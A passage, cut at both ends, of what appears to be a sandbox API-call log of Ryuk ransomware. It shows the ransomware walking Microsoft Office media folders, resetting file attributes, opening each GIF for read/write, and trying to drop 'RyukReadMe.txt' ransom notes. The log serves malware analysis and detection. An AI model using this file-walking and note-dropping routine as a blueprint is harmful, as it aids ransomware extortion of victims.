dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.929] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.929] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF", dwFileAttributes=0x80) returned 0 [0135.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21481_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.929] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.929] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.929] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF", dwFileAttributes=0x80) returned 0 [0135.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21482_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.930] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.930] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.930] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.930] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF", dwFileAttributes=0x80) returned 0 [0135.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21503_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.931] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.931] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.931] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF", dwFileAttributes=0x80) returned 0 [0135.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21504_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.931] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.931] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.931] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF", dwFileAttributes=0x80) returned 0 [0135.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21505_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.932] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.932] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.932] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.932] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF", dwFileAttributes=0x80) returned 0 [0135.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21518_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.933] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.933] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.933] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.933] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF", dwFileAttributes=0x80) returned 0 [0135.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21519_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.933] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.933] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.933] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.934] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.934] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF", dwFileAttributes=0x80) returned 0 [0135.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21520_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.934] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.934] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.935] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.935] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF", dwFileAttributes=0x80) returned 0 [0135.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21533_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.935] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.935] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.935] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF", dwFileAttributes=0x80) returned 0 [0135.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21534_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.936] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.936] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.936] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.936] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF", dwFileAttributes=0x80) returned 0 [0135.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21535_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.937] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.937] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.937] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF", dwFileAttributes=0x80) returned 0 [0135.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115834.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.937] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.937] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF", dwFileAttributes=0x80) returned 0 [0135.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115835.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115835.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.938] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.938] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.938] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF", dwFileAttributes=0x80) returned 0 [0135.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115836.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115836.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.939] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF", dwFileAttributes=0x80) returned 0 [0135.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115839.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115839.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.939] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF", dwFileAttributes=0x80) returned 0 [0135.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115840.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.940] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.940] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.940] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF", dwFileAttributes=0x80) returned 0 [0135.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115841.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.940] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.941] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.941] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF", dwFileAttributes=0x80) returned 0 [0135.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115842.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.941] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.941] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.942] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF", dwFileAttributes=0x80) returned 0 [0135.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115843.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.942] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.942] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF", dwFileAttributes=0x80) returned 0 [0135.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115844.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.943] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.943] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.943] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF", dwFileAttributes=0x80) returned 0 [0135.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115863.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.944] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.944] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF", dwFileAttributes=0x80) returned 0 [0135.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115864.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.944] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.944] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF", dwFileAttributes=0x80) returned 0 [0135.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115865.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.945] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.945] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF", dwFileAttributes=0x80) returned 0 [0135.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115866.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.946] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.946] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.946] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.946] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF", dwFileAttributes=0x80) returned 0 [0135.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115867.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.946] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.946] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.947] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.947] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF", dwFileAttributes=0x80) returned 0 [0135.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115868.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.947] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.947] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0135.947] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0135.948] SetLastError (dwErrCode=0x0) [0135.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.951] GetLastError () returned 0x5 [0135.951] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.951] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.951] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.951] SetLastError (dwErrCode=0x0) [0135.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.951] GetLastError () returned 0x5 [0135.951] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.951] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.951] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0135.953] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.956] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 